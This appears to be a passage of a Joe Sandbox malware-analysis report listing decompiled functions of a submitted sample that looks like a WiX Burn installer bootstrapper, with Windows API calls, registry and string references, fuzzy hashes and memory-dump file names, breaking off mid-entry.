API ID: DirectoryErrorLastLibraryLoadSystem
String ID:
API String ID: 1230559179-0
Opcode ID: 89deab9d89e8f0ca28c0f63ff567d799c0b56f13b359fc74bc6e69a06d165519
Instruction ID: 252dea54e1ed21d068369edd19744075be6bf8fafda8d115b400858c36d8bc0c
Opcode Fuzzy Hash: 89deab9d89e8f0ca28c0f63ff567d799c0b56f13b359fc74bc6e69a06d165519
Instruction Fuzzy Hash: B5213AB6D0133DA7CF209B649C45F9A7B68DB00762F1501AABD14F7241E670DE488BF0

Function 00D53A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00D53BB6,00000000,?,00D51474,00000000,76C1B390,00000000,76C1B390,00000000,?,?,00D513B8), ref: 00D53A20
RtlFreeHeap.NTDLL(00000000,?,00D53BB6,00000000,?,00D51474,00000000,76C1B390,00000000,76C1B390,00000000,?,?,00D513B8,?,00000100), ref: 00D53A27
GetLastError.KERNEL32(?,00D53BB6,00000000,?,00D51474,00000000,76C1B390,00000000,76C1B390,00000000,?,?,00D513B8,?,00000100,?), ref: 00D53A31

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: da954a6ffc5d8296db6151bb8e6dd881928c90febe50aa068138f17c2279055b
Instruction ID: 5571f769831a255c5d45db01ce343cecd4fa139540456142f1355c9acbe18281
Opcode Fuzzy Hash: da954a6ffc5d8296db6151bb8e6dd881928c90febe50aa068138f17c2279055b
Instruction Fuzzy Hash: B3D01273A0433957872117E66D5C95B7E58EF05AF27060127FD48E6320D725CD0096F4

Function 00D5F755 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D90F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00DBAAA0,00000000,?,00D957E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00D90F80

RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,00D67D59,?,?,?), ref: 00D5F7B9

Part of subcall function 00D91026: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,?,00000000,?,?,?,00D5F78E,00000000,Installed,00000000,?), ref: 00D9104B

Strings

Installed, xrefs: 00D5F781

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Installed
API String ID: 3677997916-3662710971
Opcode ID: fa15876e76411d7bc76c007bac5f051b65473d7481156ff1f8df8999a92d4025
Instruction ID: 00a319fb21f1df2e5d6c2914499df62a386a4102fc3c32565c9554daf266ce8e
Opcode Fuzzy Hash: fa15876e76411d7bc76c007bac5f051b65473d7481156ff1f8df8999a92d4025
Instruction Fuzzy Hash: EF014F36920218EFCF11DB94C946BDEBBB8EF04762F1541A5FC00AB110D7769E54D7A0

Function 00D90F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00DBAAA0,00000000,?,00D957E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00D90F80

Strings

regutil.cpp, xrefs: 00D90FC3

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: Open
String ID: regutil.cpp
API String ID: 71445658-955085611
Opcode ID: 20322acecef6c0847e090eb9f93381948a6a1905889f3587f32bbaf766920842
Instruction ID: e9254fb0bc461a3741d1ffee6cc58e58631d889dbba4815c0557068f4aa8ada1
Opcode Fuzzy Hash: 20322acecef6c0847e090eb9f93381948a6a1905889f3587f32bbaf766920842
Instruction Fuzzy Hash: 29F02B33601232BFDF301D56AC05FABBE49DF847B0F194125BD8A9E250E661CD0096F0

Function 00D53AF0 Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,00D5226D,?,?,00000001,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000), ref: 00D53B04
RtlReAllocateHeap.NTDLL(00000000,?,00D5226D,?,?,00000001,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53B0B

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 7842f33c78267590dfea29ba706844fbec7d57c1c5531522906dffbd0f9ad724
Instruction ID: f6462929ecd2376a4edff55f129e34bd24e02b325845be8a14969b8a94ef76c6
Opcode Fuzzy Hash: 7842f33c78267590dfea29ba706844fbec7d57c1c5531522906dffbd0f9ad724
Instruction Fuzzy Hash: F7D0C93215430DEB8F005FE8ED0DDAA3BACEB58612704840AB915D2220C739E4209A60

Function 00D5394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00D52274,?,00000001,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53960
RtlAllocateHeap.NTDLL(00000000,?,00D52274,?,00000001,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53967

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 0a9051860f57f52121a1f4fe12642637e8ee4a3c504835702a5b370e87ad47eb
Instruction ID: 3b693f948693352ea381d14756bdfb3a3dd5356f96eb03c928b18dc2c5f239e7
Opcode Fuzzy Hash: 0a9051860f57f52121a1f4fe12642637e8ee4a3c504835702a5b370e87ad47eb
Instruction Fuzzy Hash: 6AC0123219430CAB8B005FF4EC0DC56379CB714A127048402B505D2220C738E0108770

Function 00D935C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00D935F8

Part of subcall function 00D9304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00D93609,00000000,?,00000000), ref: 00D93069
Part of subcall function 00D9304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00D7C025,?,00D55405,?,00000000,?), ref: 00D93075

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID:
API String ID: 52713655-0
Opcode ID: 2942308633184db1fcce8c7724565449adb4dbe8520edfaeaae128ad6d2365d0
Instruction ID: 0a00f533b3f23e9581b0fe0c78307ee3651a5c6ab052e8299bbfd84342d67862
Opcode Fuzzy Hash: 2942308633184db1fcce8c7724565449adb4dbe8520edfaeaae128ad6d2365d0
Instruction Fuzzy Hash: BE313E76E00229AFCB11DFA8C884ADEB7F8EF09710F05456AED15FB311D6759D008BA4

Function 00D95870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80070490,00000000,80070490,00DBAAA0,00000000,80070490,?,?,00D68B19,WiX\Burn,PackageCache,00000000,00DBAAA0,00000000,00000000,80070490), ref: 00D958CA

Part of subcall function 00D910B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D9112B
Part of subcall function 00D910B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00D91163

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: da9eb1bfc2c27768f2e3fdb4cecda99be03698588448daf0fdccb954e8943f40
Instruction ID: 5a08cef1e61f6890c8e4d5468981ed788d15ebf5c48c05181469ca63c3a5b018
Opcode Fuzzy Hash: da9eb1bfc2c27768f2e3fdb4cecda99be03698588448daf0fdccb954e8943f40
Instruction Fuzzy Hash: 2D118636D0062AEF8F236E94E9459AEBB68EF04320B194279ED4167215C7314E50D7F1

Function 00D8521A Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00D81F87,?,0000015D,?,?,?,?,00D833E0,000000FF,00000000,?,?), ref: 00D8524C

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2b94c436aea0fd0be7dad901b3e1ee47e9ec5e0d78935a548c34a0ea6ebf41ab
Instruction ID: d1f64dcd24ff9d2e81f7215d98b2e28ace00e93a65a907259fe6543f15b4d7c2
Opcode Fuzzy Hash: 2b94c436aea0fd0be7dad901b3e1ee47e9ec5e0d78935a548c34a0ea6ebf41ab
Instruction Fuzzy Hash: E3E02B31501A615AD63136657C05B5F778CDFA27B1F2D0211BC25E21D8CFA0DC0043F9

Function 00D534B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00D68BD3,0000001C,80070490,00000000,00000000,80070490), ref: 00D534D5

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 21ad775b678b143a8b72737f028cea560ba1587498e05e5856a320ffbb3d51c7
Instruction ID: 1ae487f13da9c3f1ac5b2dcd02085866a0773dea3ab07dca7636ba5ae4712ebb
Opcode Fuzzy Hash: 21ad775b678b143a8b72737f028cea560ba1587498e05e5856a320ffbb3d51c7
Instruction Fuzzy Hash: 68E05B722012247BEF026FA15C05DFB7B9CDF057A67008055FE44D6110D772E55497B1

Function 00D8F49A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D8F491

Part of subcall function 00D9998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D99A09
Part of subcall function 00D9998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D99A1A

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 70137e202c405cf254ff4bc504cfd92c1753d5b6fad501d0013face59d0f003e
Instruction ID: a4623b0c458b4df5bdec54f0f4fea27845fff201a106e1d0c8043bff2101eb0c
Opcode Fuzzy Hash: 70137e202c405cf254ff4bc504cfd92c1753d5b6fad501d0013face59d0f003e
Instruction Fuzzy Hash: 31B012B1279402FD3F44621E1D23C77410CC1C5F21370456FF042C5140EC414C056532

Function 00D8F4AA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D8F491

Part of subcall function 00D9998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D99A09
Part of subcall function 00D9998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D99A1A

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7475d02890554e3f691ad230ecaa18f979180630fa22a5d53dbf440877ed1c50
Instruction ID: b8e8ae46e9e0ada9e732085242dd6ed149631eb7d9a892b83396b67853855b88
Opcode Fuzzy Hash: 7475d02890554e3f691ad230ecaa18f979180630fa22a5d53dbf440877ed1c50
Instruction Fuzzy Hash: 44B012A1279502FC3F44621E1C12C77410CC1C5F21370866FF042C5140EC504C446532

Function 00D8F479 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D8F491

Part of subcall function 00D9998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D99A09
Part of subcall function 00D9998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D99A1A

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a32a5c2d3fe930c0f902aa96d875d6fb6d1a9ec4735bc37ec53da02d11d626d2
Instruction ID: 29f775d6f577a1de15cb57857fb1505ef94fe4be86781be97bf80c507e39686a
Opcode Fuzzy Hash: a32a5c2d3fe930c0f902aa96d875d6fb6d1a9ec4735bc37ec53da02d11d626d2
Instruction Fuzzy Hash: 6DB012A5279402FC3F04221E1C12C77410CC5C1F21370C66FF442C4040AC404C046432

Function 00D99684 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D9966B

Part of subcall function 00D9998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D99A09
Part of subcall function 00D9998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D99A1A

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a93a2806eb313147af8cc3e85356609fedff37e4bfbd2955c3d5b9eb0562c289
Instruction ID: d4cbeba3de05d50b05ce92595da7bbb1a268d26bf55ef4113b77dae48bf692bc
Opcode Fuzzy Hash: a93a2806eb313147af8cc3e85356609fedff37e4bfbd2955c3d5b9eb0562c289
Instruction Fuzzy Hash: B3B012A1269201FC3F44514E2E53C7B810CC5C0B11370411EF002D1140E8414C056632

Function 00D99653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D9966B

Part of subcall function 00D9998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D99A09
Part of subcall function 00D9998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D99A1A

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d46f46c7bf4deeb4a4d7cbe9174d8b8bc9ef63de699134beb255bf0b820cc4cf
Instruction ID: d617286e39f8fe8dc180fe816fb0167031c721696074cbeacc601464b4204faf
Opcode Fuzzy Hash: d46f46c7bf4deeb4a4d7cbe9174d8b8bc9ef63de699134beb255bf0b820cc4cf
Instruction Fuzzy Hash: 6FB01291269105FC3F04110E6C92C7B810CC5C0B11370811EF002E0040A8404C046737

Function 00D99674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D9966B

Part of subcall function 00D9998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D99A09
Part of subcall function 00D9998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D99A1A

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d72bffb353f9f7d06ac4fba941e9d5dd1fb758ab02345250b49fa8e627d52a54
Instruction ID: 57cda578b839707ef1cdb641cb8496b48d8ab0f123b251f2b9574f84de2a4353
Opcode Fuzzy Hash: d72bffb353f9f7d06ac4fba941e9d5dd1fb758ab02345250b49fa8e627d52a54
Instruction Fuzzy Hash: E9B01291269102FC3F44510E1C13C77810CC1C0B11370C11EF402C1140E8404C086732

Function 00D514B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,00D521A8,?,00000000,?,00000000,?,00D5390C,00000000,?,00000104), ref: 00D514E8

Part of subcall function 00D53BD3: GetProcessHeap.KERNEL32(00000000,?,?,00D521CC,?,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53BDB
Part of subcall function 00D53BD3: HeapSize.KERNEL32(00000000,?,00D521CC,?,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53BE2

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: c5cbbdf724bae3bdc508c29eb5c74796917d7124ba9d6f885188136541717d80
Instruction ID: 28ff4e8abc2770925218017e1a369eae6e7bb955442ec5f6f1469251ebbd302f
Opcode Fuzzy Hash: c5cbbdf724bae3bdc508c29eb5c74796917d7124ba9d6f885188136541717d80
Instruction Fuzzy Hash: 2D01F93F240218ABCF115E54ECC0F9A77B59F847A2F154615FE165B251E731DC4886B4

Non-executed Functions

Function 00D5A03E Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 215COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00D5A0B6

Strings

Failed to format GUID string., xrefs: 00D5A0C1
State, xrefs: 00D5A098
Trying per-machine extended info for property '%ls' for product: %ls, xrefs: 00D5A148
Product or related product not found: %ls, xrefs: 00D5A1A1
AssignmentType, xrefs: 00D5A091
Failed to copy upgrade code., xrefs: 00D5A116
Language, xrefs: 00D5A09F
MsiProductSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 00D5A24F
VersionString, xrefs: 00D5A0A6, 00D5A131, 00D5A147, 00D5A15B, 00D5A174, 00D5A188
Failed to enumerate related products for upgrade code., xrefs: 00D5A0F1
Failed to change value type., xrefs: 00D5A21D
Trying per-user extended info for property '%ls' for product: %ls, xrefs: 00D5A175
Failed to get product info., xrefs: 00D5A1E3
Unsupported product search type: %u, xrefs: 00D5A07E
Failed to set variable., xrefs: 00D5A23C

Memory Dump Source

Source File: 00000002.00000002.1470520697.0000000000D51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000002.00000002.1470412510.0000000000D50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470604062.0000000000D9B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470670939.0000000000DBA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1470716921.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d50000_BkTwXj17DH.jbxd

Similarity

API ID: Open@16
String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
API String ID: 3613110473-2134270738
Opcode ID: de3e87830baa8bd6ef2a15e8d95fc445c38f2819b5e3736864e50364b8554e27
Instruction ID: af0dd445966b1f0dbf6878f081731877dbdfea13cd4bc3a02bcbcf0c229cf883
Opcode Fuzzy Hash: de3e87830baa8bd6ef2a15e8d95fc445c38f2819b5e3736864e50364b8554e27
Instruction Fuzzy Hash: 9D61C332D40229BFCF11DAACCD46EAE7B69EB05711F144265FD04BB251D232DE0897B6

Function 00D6F051 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 125COMMON

Download Yara Rule

APIs

Part of subcall function 00D5394F: GetProcessHeap.KERNEL32(?,?,?,00D52274,?,00000001,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53960
Part of subcall function 00D5394F: RtlAllocateHeap.NTDLL(00000000,?,00D52274,?,00000001,76C1B390,8000FFFF,?,?,00D90267,?,?,00000000,00000000,8000FFFF), ref: 00D53967

EnterCriticalSection.KERNEL32(?,00000014,00000001), ref: 00D6F06E
